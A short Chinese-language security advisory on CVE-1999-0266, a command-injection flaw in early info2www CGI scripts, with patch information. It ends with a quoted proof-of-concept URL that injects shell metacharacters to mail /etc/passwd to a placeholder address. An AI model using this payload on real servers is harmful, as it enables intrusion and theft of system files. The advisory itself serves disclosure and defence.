BugCVE: CVE-1999-0266
BUGTRAQ: 1995
“info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。
某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。
问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。
1.0-1.1
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
厂商补丁:
程序作者已经在最新版的软件中修补了此安全漏洞,请到作者的主页下载:
<a href=“http://www.gnu.org/directory/gnats.html” target=“_blank”>http://www.gnu.org/directory/gnats.html</a>
Niall Smart ([email protected])提供了如下测试方法:
访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。
http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'